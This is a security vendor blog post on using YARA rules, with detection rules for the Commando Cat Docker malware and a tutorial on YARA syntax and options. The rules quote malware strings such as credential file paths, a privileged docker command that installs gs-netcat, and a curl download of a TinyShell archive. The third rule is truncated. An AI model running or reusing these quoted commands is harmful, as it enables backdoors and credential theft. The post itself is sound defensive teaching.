How To Use YARA Rules To Detect Emerging Cloud-Based Threats
Sharing methods of detecting and identifying malware has always been a challenge for security teams across the globe.
The traditionally used hash-based indicators are often not very effective when dealing with advanced attackers. This is because hash-based indicators look for exact matches. One simple change of the malware means that the hash will change completely, rendering the indicator ineffective. Security teams can increase the odds of successfully finding malicious files by focusing on identifying malware families instead of finding exact matches. YARA is a tool that enables this type of matching and has rapidly become the de facto standard across the malware analysis community.
What is Yara?
YARA is an open-source tool used for malware research and detection. It allows security researchers and analysts to create custom rules (known as YARA rules) to identify and classify malware based on textual or binary patterns. These rules can be used to scan files or processes for signs of malicious activity.
What are YARA rules?
YARA rules typically consist of conditions describing malware characteristics, such as specific strings, byte sequences, or regular expressions. When applied to files or memory, these rules help identify whether the analyzed content matches any known malware signatures. The Cado Security Labs team regularly includes YARA rules in its releases when it discovers new malware strains. The most recent of which is to help organizations detect Commando Cat, a novel malware campaign targeting docker.
The YARA rule for detecting the Commando Cat malware
Below is an example Yara rule to detect the Commando Cat malware - note this is quite a “tight” YARA rule, designed to have low false positives. This has the trade-off of being more fixed to a particular version of the malware, vs a wider rule which would detect more variants.
rule Stealer_Linux_CommandoCat {
meta:
description = "Detects CommandoCat aws.sh credential stealer script"
license = "Apache License 2.0"
date = "2024-01-25"
hash1 = "185564f59b6c849a847b4aa40acd9969253124f63ba772fc5e3ae9dc2a50eef0"
strings:
// Constants
$const1 = "CRED_FILE_NAMES"
$const2 = "MIXED_CREDFILES"
$const3 = "AWS_CREDS_FILES"
$const4 = "GCLOUD_CREDS_FILES"
$const5 = "AZURE_CREDS_FILES"
$const6 = "VICOIP"
$const7 = "VICHOST"
// Functions
$func1 = "get_docker()"
$func2 = "cred_files()"
$func3 = "get_azure()"
$func4 = "get_google()"
$func5 = "run_aws_grabber()"
$func6 = "get_aws_infos()"
$func7 = "get_aws_meta()"
$func8 = "get_aws_env()"
$func9 = "get_prov_vars()"
// Log Statements
$log1 = "no dubble"
$log2 = "-------- PROC VARS -----------------------------------"
$log3 = "-------- DOCKER CREDS -----------------------------------"
$log4 = "-------- CREDS FILES -----------------------------------"
$log5 = "-------- AZURE DATA --------------------------------------"
$log6 = "-------- GOOGLE DATA --------------------------------------"
$log7 = "AWS_ACCESS_KEY_ID : $AWS_ACCESS_KEY_ID"
$log8 = "AWS_SECRET_ACCESS_KEY : $AWS_SECRET_ACCESS_KEY"
$log9 = "AWS_EC2_METADATA_DISABLED : $AWS_EC2_METADATA_DISABLED"
$log10 = "AWS_ROLE_ARN : $AWS_ROLE_ARN"
$log11 = "AWS_WEB_IDENTITY_TOKEN_FILE: $AWS_WEB_IDENTITY_TOKEN_FILE"
// Paths
$path1 = "/root/.docker/config.json"
$path2 = "/home/*/.docker/config.json"
$path3 = "/etc/hostname"
$path4 = "/tmp/..a.$RANDOM"
$path5 = "/tmp/$RANDOM"
$path6 = "/tmp/$RANDOM$RANDOM"
condition:
filesize < 1MB and
all of them
}
rule Backdoor_Linux_CommandoCat {
meta:
description = "Detects CommandoCat gsc.sh backdoor registration script"
license = "Apache License 2.0"
date = "2024-01-25"
hash1 = "d083af05de4a45b44f470939bb8e9ccd223e6b8bf4568d9d15edfb3182a7a712"
strings:
// Constants
$const1 = "SRCURL"
$const2 = "SETPATH"
$const3 = "SETNAME"
$const4 = "SETSERV"
$const5 = "VICIP"
$const6 = "VICHN"
$const7 = "GSCSTATUS"
$const8 = "VICSYSTEM"
$const9 = "GSCBINURL"
$const10 = "GSCATPID"
// Functions
$func1 = "hidfile()"
// Log Statements
$log1 = "run gsc ..."
// Paths
$path1 = "/dev/shm/.nc.tar.gz"
$path2 = "/etc/hostname"
$path3 = "/bin/gs-netcat"
$path4 = "/etc/systemd/gsc"
$path5 = "/bin/hid"
// General
$str1 = "mount --bind /usr/foo /proc/$1"
$str2 = "cp /etc/mtab /usr/t"
$str3 = "docker run -t -v /:/host --privileged cmd.cat/tar tar xzf /host/dev/shm/.nc.tar.gz -C /host/bin gs-netcat"
condition:
filesize < 1MB and
all of them
}
rule Backdoor_Linux_CommandoCat_tshd {
meta:
description = "Detects CommandoCat tshd TinyShell registration script"
license = "Apache License 2.0"
date = "2024-01-25"
hash1 = "65c6798eedd33aa36d77432b2ba7ef45dfe760092810b4db487210b19299bdcb"
strings:
// Constants
$const1 = "SRCURL"
$const2 = "HOME"
$const3 = "TSHDPID"
// Functions
$func1 = "setuptools()"
$func2 = "hidfile()"
$func3 = "hidetshd()"
// Paths
$path1 = "/var/tmp"
$path2 = "/bin/hid"
$path3 = "/etc/mtab"
$path4 = "/dev/shm/..tshdpid"
$path5 = "/tmp/.tsh.tar.gz"
$path6 = "/usr/sbin/tshd"
$path7 = "/usr/foo"
$path8 = "./tshd"// General
$str1 = "curl -Lk $SRCURL/bin/tsh/tsh.tar.gz -o /tmp/.tsh.tar.gz"
$str2 = "find /dev/shm/ -type f -size 0 -exec rm -f {} \\;"
How to use a YARA rule to search for malware
You can download YARA from http://plusvic.github.io/yara/. YARA is a multi-platform running on Windows, Linux, and Mac OS X. To use YARA, you will need two things: a file containing your YARA rules, and a target to scan. The basic command to run YARA is pretty simple:
yara [OPTIONS] RULES_FILE TARGET
Let's go over the sections in detail:
Options:
-t <tag> --tag=<tag>
Print rules tagged as <tag> and ignore the rest.
-i <identifier> --identifier=<identifier>
Print rules named <identifier> and ignore the rest.
-n
Print not satisfied rules only (negate).
-D --print-module-data
Print module data.
-g --print-tags
Print tags.
-m --print-meta
Print metadata.
-s --print-strings
Print matching strings.
-p <number> --threads=<number>
Use the specified <number> of threads to scan a directory.
-l <number> --max-rules=<number>
Abort scanning after matching a number of rules.
-a <seconds> --timeout=<seconds>
Abort scanning after a number of seconds has elapsed.
-d <identifier>=<value>
Define external variable.
-x <module>=<file>
Pass the file’s content as extra data to the module.
-r --recursive
Recursively search for directories.
-f --fast-scan
Fast matching mode.
-w --no-warnings
Disable warnings.
-v --version
Show version information.
-h --help
Show help.
Rule File
The Rule file can be passed directly in source code form or can be previously compiled with the yarac tool. You may prefer to use your rules in the compiled form if you are going to invoke YARA multiple times with the same rules. This way you’ll save time because for YARA it is faster to load compiled rules than to compile the same rules over and over again.
The Target
The rules will be applied to the target specified as the last argument to YARA, if it’s a path to a directory, all the files contained in it will be scanned. By default, YARA does not attempt to scan directories recursively, but you can use the -r option for that.
Using YARA from Python
YARA can be also used from Python through the yara-python library. More details can be found here.
How to create your own YARA rules
YARA rules are much less complicated than you would think and are also very simple to read. Their syntax mostly resembles C. Here is an example of an empty rule:
rule test
{
condition:
false
}
All rules in YARA start with the keyword rule and then the rule identifier. Identifiers must follow the same lexical conventions of the C programming language, they can contain any alphanumeric character and the underscore character, but the first character cannot be a digit. Rule identifiers are case-sensitive and cannot exceed 128 characters. In our rule, the identifier is “test”.
The body of the rule is made of two sections, strings definition and condition. The strings definition section can be ignored if the rule doesn't rely on any strings, but the condition section is always required.
The strings definition section is where the strings that will be part of the rule are defined. Each string has an identifier consisting of a $ character, followed by a sequence of alphanumeric characters and underscores. These identifiers can be used in the condition section to refer to the corresponding string. Strings can be defined in text or hexadecimal form. There is also the option to use wildcard characters when defining strings.
The conditions are just boolean expressions, if the condition is true then the rule will return a positive detection.
An example of a basic rule:
rule test
{
strings:
$test_text_string = "text string"
$test_hex_string = { D4 25 B5 D3 12 AC }
condition:
$test_text_string or $test_hex_string
}
For more information see the YARA documentation on creating YARA rules.
The Cado Platform
YARA rules in the Cado platform
Built-in YARA rules are just one of the tools alongside threat intelligence and machine learning that the Cado analytics engine uses to automatically flag malicious activity and potential risks. The Cado platform also supports the ability for users to create and import their own custom YARA rules into the platform for even greater flexibility and threat-hunting capability. If you want to find out more about the Cado Platform, schedule a demo with our team.
More from the blog
View All PostsThe Nine Lives of Commando Cat: Analysing a Novel Malware Campaign Targeting Docker
February 1, 2024From the Depths: Analyzing the Cthulhu Stealer Malware for macOS
August 22, 2024Qubitstrike - An Emerging Malware Campaign Targeting Jupyter Notebooks
October 18, 2023Subscribe to Our Blog
To stay up to date on the latest from Cado Security, subscribe to our blog today.